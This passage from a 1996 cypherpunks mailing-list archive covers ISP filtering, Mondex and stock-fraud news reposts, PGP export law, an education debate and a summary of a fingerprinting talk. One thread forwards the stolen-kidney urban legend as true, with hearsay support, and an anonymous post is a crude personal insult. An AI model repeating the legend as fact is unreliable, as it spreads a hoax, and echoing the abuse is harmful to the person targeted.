try to position itself as, and I quote, "The Family Channel of the 
Internet" by going SurfWatch one better.  If you sign up with them as 
your ISP, you'll only be able to access sites that they have personally 
inspected and approved.  He said that they were going to do this, again I 
quote, "using the same encryption that Visa and Mastercard use."  The 
last statment pegged my bogometer, of course.  
Now, since I know that I don't know everything about crypto, and I know 
even less about the inner workings of IP, I'm going to pose a couple of 
questions:

1) Is it technically possible for them to limit access to only approved 
IP addresses?  If so, how can they do this, and is it possible to get 
around these measures.

2) What in the world would SET--I assume that was what he was talking 
about--have to do with this?

3) In general, how would you use crypto to ensure that your users only 
connected to approved sites, regardless of the platform or browser 
software they were using?

I asked the guy to send me some technical details.  If I receive them, 
I'll share unless he makes me sign an NDA.

Ken




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 6 Dec 1996 17:40:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: KIDNEYS STOLEN FROM A NAKED DRUGGED MAN
Message-ID: <v02140b00aece7a3a9c9e@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


I heard an almost identical story from a security guard at DEFCON IV last
july in Las Vegas.  He said it happened in the hotel where he was working
(not the Monte Carlo, which had just opened) in 1995.  The management
managed to cover the event up and it never, according to him, appeared in
the local papers.


>| >>>  A friend of mine from UT passed this story onto me from the "Daily
>| >>>  Texan" - the University of Texas newspaper. Apparently it occured
>| >>>  during Fall Premier -- a UT tradition that is a celebration of the
>| >>>  end of midterms.
>| >>>
>| >>> >"Reason to not party anymore"-
>| >>> >
>| >>> >
>| >>> >This guy went out last Saturday night to a party.  He was having a
>| >>> >good time, had a couple  of beers and some girl seemed to like him
>| >>> >and invited him to go to another party.  He quickly agreed and
>| >decided
>| >>> >to go along with her.  She took him to a party in some apartment
>| >and
>| >>> >they continued to drink, and even got involved with some other
>| >drugs
>| >>> >(unknown which).
>| >>> >
>| >>> >The next thing he knew, he woke up completely naked in a bathtub
>| >>> >filled with ice.  He was still feeling the effects of the drugs,
>| >but
>| >>> >looked around to see he was alone.
>| >>> >
>| >>> >He looked down at his chest, which had "CALL 911 OR YOU WILL DIE"
>| >>> >written on it in lipstick.  He saw a phone was on a stand next to
>| >>> >the tub, so he picked it up and dialed.  He explained to the EMS
>| >>> >operator what the situation was and that he didn't know where he
>| >was,
>| >>> >what he took, or why he was really calling.  She advised him to get
>| >>> >out of the tub.  He did, and she asked him to look himself over in
>| >>> >the mirror.  He did, and appeared normal, so she told him to check
>| >>> >his back.  He did, only to find two 9 inch slits on his lower back.
>| >>> >She told him to get back in the tub immediately, and they sent a
>| >>> >rescue team over.
>| >>> >
>| >>> >Apparently, after being examined, he found out more of what had
>| >>> >happened.  His kidneys were stolen.  They are worth 10,000 dollars
>| >>> >each on the black market.  (I was unaware this even existed.)
>| >>> >Several guesses are in order:
>| >>> >The second party was a sham, the people involved had to be at least
>| >>> >medical students, and it was not just recreational drugs  he was
>| >>> >given.
>| >>> >
>| >>> >Regardless, he is currently in the  hospital on life  support,
>| >>> >awaiting a spare kidney. The University of Texas in conjunction
>| >>> >with Baylor University Medical Center is conducting tissue research
>| >>> >to match the sophomore student with a donor.
>| >>> >
>| >>> >Any information leading to the arrest of the individuals may be
>| >>> >forwarded to the University of Texas Campus police, or the Texas
>| >>> >Rangers.
>| >>> >






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Fri, 6 Dec 1996 15:14:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961206.171251.8567.0.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


New York Times: Thursday, December 5, 1996
 
Stock Hyped On Internet Resumes Trading
 
By LESLIE EATON
 
Peter Usinger was incensed. The Rochester business consultant was using
the

Internet, as he often does, to check up on a little company he had bought
stock in called Omnigene Diagnostics Inc. 
 
But when Usinger reached the company's site on the World Wide Web, he
did not find the usual information about its patented test to diagnose
gum
disease. Instead, he read that the company was in default on the license
agreement that lets it use the patent -- the company's main asset.
 
Usinger fired off an angry electronic message to the Web site manager,
who
had put up the information. Usinger correctly suspected the site manager
was
embroiled in a dispute with the company. ``If you are not able to
substantiate
your claims and we have to take a financial loss,'' Usinger wrote, ``we
will
notify our lawyers.'' 
 
The manager, Robert Gibson, shot back his own e-mail, with enough details
to convince Usinger. And that was the beginning of the end of a
high-technology hype that had turned Omnigene Diagnostics stock from a
dud into a high flyer almost overnight. Within two weeks, the Securities
and
Exchange Commission halted trading in the stock and announced its action
on America Online, the agency's first such use of an electronic bulletin
board.
 
With the expiration Wednesday night of the trading suspension, the
cyberspace drama resumes Thursday. If the stock follows the usual
pattern, it
could well fall back to earth with a thud. 
 
The Omnigene Diagnostics story shows the effects Internet technology is
having, for good and bad, on investors and investing. Reams of
information
are available -- but truthfulness and accuracy can be almost impossible
to
judge. Amateur investors find their way to obscure securities and mingle
online with both stock promoters trying to drive prices up and
short-sellers
trying to drive prices down.
 
But the tale also illustrates the changes occurring in the still young
world of
Internet investing. Securities regulators are becoming more aggressive
about
online stock fraud; at the same time, individual investors like Usinger
are
becoming warier and starting to use the power of the Internet to protect
themselves. 
 
``A lot has changed -- dramatically -- in the last six months,'' said
John 
Stark,
a lawyer for the SEC who specializes in Internet fraud. ``There was a
real
culture of trust and benevolence; now people are becoming more
skeptical.'' 
 
And not a moment too soon. Online investing is growing by leaps and
bounds; with that growth has come a corresponding rise in scams,
including
manipulation of small stocks with few shares outstanding. ``It's a growth
industry,'' said William McLucas, the director of enforcement for the
SEC. 
 
Regulators are investigating several suspected ``pump and dumps,'' in
which
the Internet is used to stir up investor enthusiasm and inflate prices.
The
perpetrators, who usually own shares they acquired for little or no
money,
sell them into the rising market. When the scam falls apart, legitimate
investors are left holding the worthless shares. 
 
To be sure, such schemes have flourished for decades without the
Internet.
And the Omnigene Diagnostics story includes some traditional elements of
stock hype, including the use of a radio talk-show host, who was paid
with
stock to promote the company. 
 
But the Internet was integral to the rise and fall of Omnigene
Diagnostics,
which is based in West Palm Beach, Fla. The stock was touted on
electronic
bulletin boards; clues about the company's problems first appeared on its
site
on the World Wide Web; the details were fleshed out using e-mail, which
was also employed to alert regulators, and the company's management took
to the Net to defend itself before the SEC stepped in online. 
 
When Omnigene Diagnostics first showed up on Internet bulletin boards in

early October, virtually identical messages praising the company appeared
on
different boards, signed with different names. These messages said the
company had no competition, had already racked up sales of $400,000,
would have revenues of more than $2 million next year and had only
450,000
tradeable shares. Urging readers to call the company's 800 number for
more
information, the messages concluded, ``This could be your stock buy of
the
year ... Take a look NOW.'' 
 
By then, the share price of Omnigene Diagnostics, known as ``Oh My God''
because of its ticker symbol of OMGD, had already jumped from $1, where
it traded over the counter -- very occasionally -- in July, to about $4.
But as
the Internet messages flew, so did the price, topping $6.50 by
mid-November. 
 
Even early on there were voices of caution. ``Oh no, not another FL
company,'' wrote someone on America Online's Investor Network. ``I have
heard that a lot of scams originate out of Florida.'' Other writers noted
that
the company did not seem to have filed documents with the SEC, and was
not traded on an exchange. 
 
But naysayers were quickly shouted down by writers who accused them of
trying to profit from a drop in the stock price. The boosters hinted of a
deal
with Procter & Gamble, and cheered each day's rising price with lines
like,
``I'm going to ride this train to the gold mine. Toooot!! TOOOOT!!'' 
 
Meanwhile, the Internet was helping to bring together two men with a
rather
different view of Omnigene Diagnostics: Robert Gibson, a computer
programmer in Florida, and Peter Mahler, president of the company's
former
parent, Omnigene Inc. of Cambridge, Mass. 
 
With sales at its diagnostics unit declining, Omnigene Inc. sold the unit
in May
1995 to the American Biodental Corporation, of Boca Raton, Fla., which
makes dental implants. Though its testing operations continued in
Cambridge,
Omnigene Diagnostics was to be run from Florida. 
 
But almost from the beginning, things went wrong, Mahler said. Omnigene
Diagnostics quickly fell behind on its rent and royalty payments to its
former
parent. Most of its staff quit, and Mahler's company went to court to
evict its
one-time subsidiary. Though the company dropped the suit after receiving
a
payment, Omnigene Diagnostics still owes it money, Mahler said. 
 
Even worse, people were confusing Omnigene Inc. with Omnigene
Diagnostics and its troubles; another spinoff, Omnigene Bioproducts,
mistakenly had its credit shut off, Mahler said, adding, ``It's an awful
situation.'' 
 
But the final straw for Mahler may have been Omnigene Diagnostics' Web
site, which had the address www.omnigene.com. 
 
The site was operated by Gibson, the computer programmer, whose main
business includes running Web sites for legal process servers. Last year,
at an
Office Depot store in West Palm Beach, Gibson bumped into an old
acquaintance, Dominic Scacci, and eventually agreed to do some
programming for businesses Scacci was involved with, which included
Omnigene Diagnostics. In fact, Gibson said, he ended up sharing an office
with Scacci, who used his phones, computers and copier. 
 
But like Mahler, to whom he had spoken about Omnigene Diagnostics'
computer system, Gibson said he was having trouble getting paid. The
company did not seem to be doing nearly as much business as Scacci said.
And earlier this fall, Gibson began to have suspicions about what Scacci
was
up to. 
 
``The company was always short of money, and suddenly Dominic drives up
in a new car,'' Gibson recalled. He also found a list, left in his
computer by
Scacci, that indicated the company had been issuing hundreds of thousands
of free shares to Scacci's other companies, his friends and family,
Gibson

said. ``It started to smell,'' he said, so he called the SEC. 
 
Shares also went to Jerome Wenger, host of ``The Next Superstock,'' a
program that is heard on radio stations around the country, including
WEVD
in New York. In an interview, Wenger said that he received the stock for
serving as a consultant to bring the company to investors' attention, and
that
he discloses such arrangements to his listeners. 
 
On Oct. 31, Mahler sent an e-mail to Gibson complaining that the Web
site's
address infringed on his trademark and saying that unless the site was
removed immediately, ``legal action will result.'' 
 
Instead, on Nov. 3, Gibson changed the first page of the site to the
message
that so irked Usinger, the Rochester investor. (Gibson also took his
equipment out of the office he had shared with Scacci.) 
 
Which brings the story back to the angry e-mail sent by Usinger, who had
bought several hundred shares of Omnigene Diagnostics in October. 
 
After Gibson replied to his message, Usinger said, ``all the little
tricks you 
see in shells and scams started surfacing like little bubbles.'' So he
decided to
send some information to the SEC's online complaint division. He also
decided to sell his stock, at a nice profit. 
 
As Usinger and a few other investors began posting their information on
the
bulletin boards, a free-for-all broke out in cyberspace. Some people
scolded
Usinger for trying to make people panic and sell their shares, and bulls
and
bears got into online shouting matches. 
 
Messages signed by Scacci appeared, saying that Gibson owed him money
and had encoded the company's computer data. ``He demanded $10,000 to
give us the key,'' read one such message posted on Nov. 7 on a bulletin
board on the Silicon Investor Web site. ``I refused. This is when he
decided
to proceed to send falsehoods out over the Internet.'' 
 
As for the default on the patent license, a message on America Online
signed
Scacci6733 said that Omnigene Diagnostics ``owns the patent purchased
from Omnigene Inc. It's as simple as that.'' 
 
But there were a number of things Scacci did not tell people in his
messages.
A former stockbroker with a history of regulatory run-ins, Scacci has
filed for
personal bankruptcy protection twice, according to regulatory records. 
 
Scacci was the agent for something called the Austria International Fund,
which was based in the Bahamas, according to documents filed with the SEC
by American Biodental. These filings say that it was really the fund, not
American Biodental, that spent $189,000 to buy Omnigene Diagnostics. 
 
Omnigene Diagnostics was spun off in January, shortly before American
Biodental filed for bankruptcy protection. But American Biodental's
shareholders never received any OMGD shares, said Ingo Kozak, a director
of American Biodental, which has changed its name to Biolok International
Inc. 
 
Scacci said in a brief interview last week that, on the advice of his
lawyers,
he could not answer questions about the Omnigene situation. But he said
his
previous regulatory difficulties were basically problems with
record-keeping.
And he denied being the agent for the Austria International Fund. 
 
On Nov. 20, the SEC said it was suspending trading in Omnigene
Diagnostics' shares for 10 business days, the maximum allowed. The
reason:
questions about the company's ``alleged ownership and other rights as to
certain patents and trademarks, ODI's sales, past and projected, ODI's
operations and facilities, and the number of freely traded shares.'' 
 
The SEC posted a notice of the halt on America Online's bulletin board
because ``it looks like one of the vehicles people were using to
disseminate a
substantial amount of hype'' about the company, said McLucas, the
enforcement chief, adding that he expects the agency to make similar
electronic announcements in the future. 
 
Whether the SEC will go after anyone it believes has hyped the stock
electronically is unknown; the commission never comments on current
investigations. 
 
The company's fate will become clearer Thursday, when trading can resume
-- which will occur only if brokerage firms are confident they have
enough
information to make bids on the stock. In the past, stocks in which
trading
has been suspended have tended to plunge when it resumes. 
 
Gibson is still unhappy about his run-in with Omnigene Diagnostics and
the
investors who excoriated him online. But, he said, ``the good news is
that this
stuff can come to the surface quicker because of the open lines of
communication'' that the Internet allows. 
 
As for Usinger, he said that his Omnigene experiences have made him a
more
cautious investor. And that despite the abuse he received from some
online
critics, he does not regret having shared his discoveries about the
company
with his fellow Internet investors, some of whom also got their money out
before trading was halted. 
 
``I thought everyone should know this,'' he said. ``It's the difference
between
having something more before Christmas and having nothing.'' 

  
New York Times: Thursday, December 5, 1996
 
Mastercard's "Smart Card" Builds Support 
 
By SAUL HANSELL 
 
Seven financial giants, including Wells Fargo, Chase Manhattan and Dean
Witter, Discover, have agreed to market the Mondex electronic-cash
product in the United States. 
 
The Mondex ``smart card,'' which was developed in Britain, is a plastic
card
containing a computer chip that can be used to make purchases in vending
machines, via pay telephones and over the Internet. Customers can
transfer
money onto and off the card at an automated teller machine or by using a
specially equipped telephone. 
 
The backing ensures that Mondex will be one of the leading systems in the
country as the market for smart cards evolves. 
 
Last month Mastercard International bought 51 percent of the
international
arm of Mondex, which will sell franchises in various regions. 
 
The seven companies plan to announce Thursday that they will form a
company to offer Mondex in the United States. Wells Fargo & Co. will own
30 percent of Mondex USA, Chase will own 20 percent, and 10 percent
stakes will each be owned by Dean Witter, AT&T, First Chicago NBD,
Michigan National Bank and Mastercard. 
 
This group will license the right to issue Mondex cards to other
financial
companies. 
 
The card will get its major introduction in the United States in New York
City as part of a test by Chase and the Citibank unit of Citicorp. That
test,
which will involve 50,000 consumers and 500 merchants, was to have
introduced another smart-card system, Mastercard Cash. 
 
But when Mastercard bought Mondex, it abandoned that system, and Chase
will have to modify its systems to use Mondex.
 
``We were moving along at a real good pace and expected to deliver
Mastercard Cash, as promised, in the first quarter,'' said Ronald Braco,
senior vice president of Chase. ``But we felt it would be foolish to go
forward. Chase is not in the business of having our customers test
technology
that has no future.'' 
 
In the New York test, Citibank will use the Visa Cash smart-card system
by
Visa International. A primary goal of the test is to develop terminals
for
merchants to use that will be able to accept both the Visa and the Mondex
cards. 
 
Unlike Visa Cash and other smart-card programs, Mondex allows people to
transfer money between their cards, allowing a parent to put money on a
child's card, for example. The transfers use a $100 calculating device
called
an electronic wallet. 
 
The owners of Mondex will conduct several tests in the next year. Plans
call
for introducing the product more widely in 1998. 
 
Initial tests of smart cards -- such as the high-profile introduction
Visa Cash
had at the Atlanta Olympics -- have shown that the technology is
effective
but that consumer demand is tepid. 
 
``The technology works well, but the consumer proposition has not been a
grand-slam home run,'' said Janet Crane, president of Mondex USA. ``Cash
works fine, and getting people to replace something they are quite happy
with
is very hard.'' Ms. Crane said that additional smart-card applications,
such as
shopping on the Internet, and frequent-buyer rewards at fast-food
restaurants
would help spur Mondex's acceptance. 
 
Still, it is unclear who will be willing to bear the costs of introducing
expensive new technology. Merchants have to buy new terminals that now
cost about
$500. 
 
The cards themselves cost $10 each wholesale. And Mondex USA will
charge banks that issue the cards 25 cents each time money is transferred
to
Mondex cards. The banks, in turn, are expected to pass this fee and their
own costs to customers.
 
The inclusion of Dean Witter puts that company in the unusual role of
cooperating with Mastercard, which has stringent rules against linking
its
brand with rival credit-card marketers like Discover. 
 
Shawn Healy, a Mastercard spokesman, said that unlike credit cards,
Mondex was meant to be an ``open system.'' 
 
Dean Witter's main interest is in offering merchants the ability to
accept
Mondex cards. The company has not decided yet whether to add a chip that
can store Mondex cash on its Discover cards or to offer Mondex as a
separate product.
 
 
 
American Banker: Thursday, December 5, 1996
 
Wells, Chase Take Lead Stakes As Seven Invest in Mondex
USA 
 
By JEFFREY KUTLER
 
Wells Fargo & Co. and Chase Manhattan Corp. head a group of seven U.S.
companies making equity investments in the Mondex smart card system. 
 
Wells and Chase -- through subsidiaries Wells Fargo Bank and Texas
Commerce Bank -- have acquired 30% and 20%, respectively, of Mondex
USA, the global payment organization's U.S. franchise. 
 
They will be joined by five 10% owners in a formal announcement today of
the launching of Mondex USA. It will be based in San Francisco, with
Wells
Fargo executive Janet Hartung Crane as president and chief executive
officer.
 
"We have an impressive group of well-capitalized players who are making
very significant, long-term commitments," Ms. Crane said in an interview
Wednesday. 
 
She said her unit would begin in earnest to staff up in January -- it has
heretofore relied on about 15 Wells people led by Ms. Crane and executive
vice president Dudley Nigg - to "propel Mondex in the United States." 
 
Along with Wells and Texas Commerce, two other national banks --
subsidiaries of First Chicago NBD Corp. and Michigan National Corp. --
got approval this week from the Office of the Comptroller of the Currency
to
participate in Mondex USA. 
 
Also owning 10% each will be three nonbanks that did not require OCC
clearance: Dean Witter, Discover & Co.; AT&T Corp.'s Universal Card
Services unit; and MasterCard International Inc. 
 
Only Wells and AT&T were previously listed as Mondex owners. They and
Natwest Group, the London banking company that developed Mondex,
were the first equity participants in Mondex USA and were among the 17
"global founders" of the Mondex International umbrella organization
incorporated in July. 
 
Wells and AT&T "sold down" their interests to accommodate the five
additional partners, Ms. Crane said. And Natwest Group completely sold
what was designed to be a temporary, minority stake. 
 
Meanwhile, Mondex International is in a state of flux, awaiting
MasterCard's
purchase of a 51% interest, leaving the U.S. company, Mondex UK, and
other regional entities with pieces of the remaining 49%. 
 
The U.S. owners did not disclose the value of their equity stakes. It has
been
publicly acknowledged only that the original capitalization of Mondex USA
was 30 million British pounds, or about $50 million. 
 
That is likely to be a fraction of the marketing and development
expenditures
required to realize Mondex's vision of "global electronic cash." 
 
"This is something that is definitely not going to be a smashing success
in one
year," Ms. Crane said. 
 
But given Mondex's blue-chip backing and the owners' desire to sign
others
as card issuers, merchant-acquirers, and licensees, Ms. Crane said she
has
every reason to be confident. 
 
As evidence that momentum is already building, she cited growing trials
in
Britain and Canada, the rapid sign-up of 12,000 cardholders for a test in
Hong Kong, and commitments from technology vendors like Verifone Inc. to
create the necessary infrastructure. 
 
Infrastructure-building and pilot testing are the Mondex USA priorities
for
1997, the CEO said. Wells has 800 employees using the chip cards at 22
merchants; AT&T just launched a 200-employee test in Jacksonville, Fla.,
and is planning to handle "virtual" transactions via the Internet and
intranets.
 
 The last will demonstrate Mondex's ability to operate in both the
physical and
virtual worlds, which Ms. Crane said gives Mondex a unique advantage. 
 
An eagerly awaited New York City trial -- the first attempt by MasterCard
and Visa to prove their competing technologies can "interoperate" -- has
been put off from the first to the fourth quarter next year, in part to
let
MasterCard implement the Mondex system. 
 
Each of the Mondex USA owners has a seat on the board of directors, with
Mr. Nigg of Wells as chairman. Ms. Crane, who joined Wells a year ago
from MasterCard, is also a director as well as Mondex International vice
chairman.
 
The others are Walter Korchin, senior vice president and general counsel
of
AT&T Universal Card Services; Ronald Braco, senior vice president at
Chase; William Simmons, executive vice president of Novus, the Dean
Witter merchant services unit; Bruce Nyberg, senior vice president, First
Chicago NBD; Alan Heuer, MasterCard's U.S. region president; and
Michael King, senior vice president of alternative delivery at Michigan
National. 
 
Michigan National's parent, National Australia Bank, is a Mondex global
founder. 
 
Mondex USA actually consists of two Delaware-incorporated entities: a
services company headed by Ms. Hartung and a lower-profile originating
company charged with monetary operations and risk management issues.
Wells Fargo vice president Jim Rudd is president of the latter. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 6 Dec 1996 18:32:49 -0800 (PST)
To: Declan McCullagh <declan@eff.org>
Subject: Re: PGP in Russia
Message-ID: <199612070232.SAA04844@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:29 AM 12/6/96 -0800, Declan McCullagh wrote:
>A slight correction -- taking PGP out of the US is not illegal, as long 
>as you take adequate measures under the presonal use exception to prevent 
>your laptop from being stolen by foreign nationals and keep records of 
>your trip for five years. At least that's what y my friend from the State 
>Dept told me when we had dinner a few weeks ago. 

Don't the ITARs say it's illegal to "disclose" that material to a foreign 
person?  If that's the case, then presumably a person could take the 
material out of the country without "disclosing it," or he could "disclose" 
it to that foreign person inside the US.    True, the government seems to 
have already taken the position that there is a personal-use exemption, but 
so far we haven't heard any action with regards to in-country disclosure to 
a foreigner.  I'm not trying to give them any nasty ideas, but a domestic 
sting with this as its nexus seems possible.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Fri, 6 Dec 1996 19:27:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Coderpunks
Message-ID: <199612070228.SAA21299@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim C[retin] May's IQ is lower
than the belly of a pregnant snake.
His ignorance and stupidity are bottomless.

       o       o
     /<         >\ Tim C[retin] May
     \\\_______///
     // ||||||| \\




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: furballs <furballs@netcom.com>
Date: Fri, 6 Dec 1996 18:34:24 -0800 (PST)
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: Re: Decline of Science ?? (Was: Stinger Specs)
In-Reply-To: <Pine.HPP.3.91.961206114031.14965A-100000@cor.sos.sll.se>
Message-ID: <Pine.3.89.9612061736.A18241-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 6 Dec 1996, Asgaard wrote:

> 
> Attila wrote:
> 
> > to participate. junior colleges are graduating students who
> > would not have passed out of tenth grade 20-30 years ago.
> 
> <etc. about Gen 3 (-5) as in Tim's example>
> 
> Isn't this merely an effect of mass education instead of
> elite_only education? And the peak performers will do as
> well as they ever did? Doesn't every generation claim that
> the younger people get defective education in some sense?
> The Latin speakers of Gen 1 were horrified that Gen 2 didn't
> get a thorough understanding of classic Greek culture and
> geometry (but started with 'sets' and 'subsets' instead). 

I disagree. The parochial schools (at least in Oregon) are also showing 
declining test scores. As a parent I make it a habit to look through the 
text books to see what they are teaching - and as expected, the 
Revisionists have not only rewritten and deleted much of the relavent 
American and World history, but have watered down the math and science to 
the point or ludicracy in some cases. Let's face it, when Bill Nye the 
Science Guy is the most popular and the *most informative* science 
educational show on the mass media tube - we've got more than a little 
problem (For the Bill Nye fans - yes I do enjoy watching the show with my 
younger kids).

As a second oberservation, much of the yuppie/hippie generations dont 
seem to give a damn about what their kids are taught - but more that the 
grades are good and they qualify for the "right" schools. Many of these 
schools (college's) are finding that they have to teach the rudiments 
before moving onto what they would have taught first year had the kids 
come properly educated in the first place.

Having lived in a number of school districts (some better than others), 
the problem of parental non-participation and NEA interference is endemic 
at those institutions where my children have attended. I have even taken 
on teachers and adminstrators over the issues of lack of home work, why 
my children have *not* read literature such as Shakespeare, why they are 
not learning about the Founding Father's, why Columbus is considered 
politically incorrect, why they are not requiring Algebra prior to the 
Senior year in High School, why my children must be subject to 
"sensitivity training" as *part* of the curriculum, and the list goes on.

The US spends more money per child each year, but the level of education 
and necessary skill drilling keeps declining, being replaced by courses 
in sex education, diversity training, etc. - creating a class of state 
indoctrinated, functionally illiterate, non-competative individuals that 
think the goverment is mom and pop. 

As for the best and the brightest, they will only succeed if the parents 
take responsibility for managing their kid's education. I know Attila's 
kids personally, and just about any one of them is intellectually capable 
and educated enough to mop the floor with a majority of posters I have 
seen on this list. Why? Because he has spent years fostering their 
inquisitive nature and getting them to push themselves along - outside of 
and at the expense of the teachers' and administrators' sanity.

> 
> Science is still exploding in electro-physics, digital
> programming, molecular biology and several other fields.
> (I wonder what is happening in Pure Math with No Applications
> - not even for Cryptography :) - these days?) And formal
> education is gradually loosing to actual competence.
> 

Interesting point. More to the point, where is the innovation in the field 
coming from? Europe ? Asia? US? elsewhere?

> A real difference, though, is the relative lack of multidisciplinary
> theorists nowadays, I mean with a deep understanding of several
> 'unrelated' fields of knowledge. Most of us with actual competence
> in a certain area are SUBspecialists. This is natural since the
> knowledge bases have exploded to become impossible for any one man
> or woman to comprehend. An industrial cobol programmer probably
> doesn't know shit about Java (perhaps a bad example; I'm not
> a programmer, but I know a guy who makes a good living off cobol!)
> and a PCR biochemist hacking DNA doesn't know shit about immunology
> or molecular neurology. In bio-science there is a discipline
> which tries to put all such kinds of specialties into a broader
> understanding of the human/animal body and soul - it's called
> physiology, and is a declining field with chronic lack of funds;
> not much money in it. I'm sure there is a comparable discipline
> of computer science that I'm not able to name (information theory??),
> with similar economic problems. But there is still hope for the GMAU
> (Grand Meta-Analysis of the Universe); AltaVista is a new, good start
> for collecting ingredients :-)
> 

I will agree with you here. It has been said to me many times by Buisness 
types and Scientists that the days of the Generalist have long since 
died. One must specialize in order to survive. While there may be a 
certain amount of truth to that - it is a short sighted and disasterous 
claim at best, as it precludes the visonaries who understand the big 
picture and can collect, organize, and execute designs the push us 
forward with useful innovations.

> 
> So, I'm not worried. When I indulge in the inevitable bashing of
> younger generations I stick to their bade taste of music, like rap
> and hip-hop (but some acid house/techno is ok), and appearance, like
> tatoos and piercing, and life-style, like working-out, cliff-climbing
> and resorting to vitamins, herbal medicine and other useless stuff.
> (But even so, psychodelic drugs are making a come-back which I think
> is a Good Thing.)
> 
> 
> Asgaard (Gen 2)
> 

Every generation has their "rebellious" stage designe to piss off the 
"establishment". What I find amusing is that liberal parents are 
horrified when their kids, cut their hair, take an interest in education, 
economics and politics, and turn conservative as a result. :-)

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@media.mit.edu (Nelson Minar)
Date: Fri, 6 Dec 1996 15:36:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: summary of talk by Birgit Pfitzmann on "Asymmetric and Anonymous Fingerprinting"
Message-ID: <199612062335.SAA09798@hattrick.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


I just heard an interesting talk by Birgit Pfitzmann of the University
of Hildesheim on "asymmetric and anonymous fingerprinting". I thought
I'd write up a little summary of the techniques she presented, what
they are good for. More detail (including papers) is available on the
web at
  http://www.semper.org/sirene/
see below for specific references

Quick summary: 
  background for what fingerprints are and what they're good for
  traditional fingerprints are symmetric - buyer and merchant both
    have the fingerprinted data
  scheme for asymmetric fingerprinting so only buyer has the fingerprint
    but merchant can still trace fingerprint
  scheme for anonymous asymmetric fingerprinting so buyer remains anonymous


Fingerprinting is something like watermarking. The basic idea is
giving merchants of data some way to protect themselves if
unauthorized copies of the data are made. Watermarking is useful for
proving that a document came from some provider. Fingerprinting goes
further in that the merchant gives different buyers subtly different
copies of the data - if a copy shows up, the merchant can look at the
fingerprint imbedded in the data and figure out who leaked the copy.


Traditional fingerprinting has a few hard problems. First, the
fingerprint marks need to be embedded in the data without causing any
significant change to the data itself. But this goal is in tension
with the goal of having the fingerprint survive through potentially
lossy transforms. Ie, if I want to fingerprint an audio stream I could
modify some of the least significant bits. But then if that audio
stream were compressed through some lossy filter the fingerprint might
be removed. 

Furthermore, you want to make it difficult for multiple buyers to
collude to remove your fingerprint. Ie: if two buyers compare their
purchased data they can identify the parts that are different and
conclude that these parts are part of the fingerprint. A good
fingerprint coding will make this sort of collusion difficult,
although there's a tradeoff between the size of the fingerprint and
the number of colluders you can protect against.

In a typical fingerprint protocol the merchant calculates the
fingerprint, applies it to the data, and then gives the marked copy to
the buyer. This is OK except that it means that if an illicit copy of
the data shows up no one can prove whether it was the buyer who was
responsible for the copy or if it was the merchant. At first glance
this might seem silly (what incentive does the merchant have to make
illegal copies?) but you can imagine several scenarios where this is
a problem. For instance, the buyer wants to be sure it's impossible
for the merchant to frame him or her. Also if the merchant's data
storage is insecure then someone could steal the merchant's copy and
the buyer would be falsely accused.


So traditional fingerprints are something like symmetric
authentication schemes: both the merchant and the buyer have the
secret. The asymmetric fingerprint scheme presented provides a way for
the merchant to guarantee that the buyer gets a fingerprinted copy of
the data but *the merchant never has a copy of the data with the
fingerprint*. Ie: the fingerprinted version is a secret that only the
buyer has. This is analagous to asymmetric authentication: people can
check that the fingerprint belongs to a buyer but they can't generate
it. If a copy with the fingerprint is released then the world knows
which buyer is to blame.

The details of how this is accomplished were presented but I confess I
didn't follow them very closely. Each buyer has a public/secret key
pair: the fingerprint is keyed to the buyer's secret key. With a bit
commitment algorithm it's possible to arrange it so that the merchant
can generate a fingerprint based on the buyer's secret key without
actually seeing the key or the fingerprint itself. The merchant can
check if a copy of his data came from a buyer by checking the
fingerprint with the buyer's public key. I'm sure the paper has the
details of the actual algorithm.


The system sketched above is not anonymous - the merchant knows the
identity of the buyer. The next goal is to make it possible for a
buyer to get a fingerprinted copy of data from the merchant without
revealing his or her identity. Full anonymity is currently not
possible. I didn't follow this very well, but my understanding is
there's some scheme where the buyer registers a pseudonym with a third
party who then works with the merchant to perform the transaction. The
third party doesn't need to be trusted. Consult the web site for details.


Overall, this work seems like a nice improvement on fingerprinting
schemes. The asymmetry seems like a big win to me. 

The two directly relevant papers are linked from 
  http://www.semper.org/sirene/lit/abstr96.html

  Birgit Pfitzmann, Matthias Schunter: Asymmetric Fingerprinting;
  Eurocrypt 96, LNCS 1070, Springer-Verlag, Berlin 1996, 84-95.

  Birgit Pfitzmann, Michael Waidner: Anonymous Fingerprinting; IBM
  Research Report RZ 2881 (#90829) 11/18/96, IBM Research Division,
  Zürich, Nov. 1996.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: furballs <furballs@netcom.com>
Date: Fri, 6 Dec 1996 18:43:05 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The Science Generations
In-Reply-To: <v03007800aece135625e1@[207.167.93.63]>
Message-ID: <Pine.3.89.9612061844.A18241-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 6 Dec 1996, Timothy C. May wrote:

> At 1:12 AM -0800 12/6/96, Dale Thorn wrote:
> >Timothy C. May wrote:
> 
> >> * Generation 3: The computer generation. The 1970s-80s, who grew up with
> >> Commodore PETs and Apple IIs (and some later machines). These are the "new
> >> pioneers"  of the 1980s-90s, the Marc Andreesens and the like.
